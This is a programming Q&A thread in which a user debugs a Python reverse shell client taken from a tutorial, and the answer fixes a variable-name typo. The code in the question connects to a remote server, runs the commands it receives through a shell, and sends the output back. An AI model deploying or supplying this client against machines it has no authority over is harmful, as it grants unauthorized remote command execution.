# socket client issue '__getitem__'

Tags: python-2.7, shell, sockets, reverse

Hi there I was watching some tutorials about a Revers shell using python in youtube https://www.youtube.com/watch?v=-QMPYah8fWI&index=5&list=PL6gx4Cwl9DGCbpkBEMiCaiu_3OL-_Bz_8][1]

the purpose of this client is to receive command from the server , the server works great but when I ran the client it gave me this

```
File "/root/Desktop/Revers/client.py", line 15, in <module>
if data[:2].decode('utf-8') == "cd":
TypeError: 'module' object has no attribute '__getitem_
```

here is the code  :

```
 s = socket.socket()
 s.connect((host, port))

 while True:
     date = s.recv(1024)
     if data[:2].decode('utf-8') == "cd":
         os.chdir(data[3:].decode("utf-8"))
     if len(data) > 0:
         cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                           stdin=subprocess.PIPE)
         output_bytes = cmd.stdout.read() + cmd.stderr.read()
         output_str = str(output_bytes)
         s.send(str.encode(output_str + str(os.getcwd()) + '> '))
         print(output_str)

 s.close()
```

Comment: Off-topic: Running a desktop environment as root is a bad idea.

Answer (score 0, accepted):

There is a typo on this line:

```
     date = s.recv(1024)
```

`date` instead of `data`.

So the expression `data[:2]` calls `data.__getitem__` where `data` is defined before.

As the error about a `'module' object`, I guess `data` is a module you importe before.

Comment: Yeah sure thanx when I checked  I saw that I Import data module from scapy

Like : from scapy import data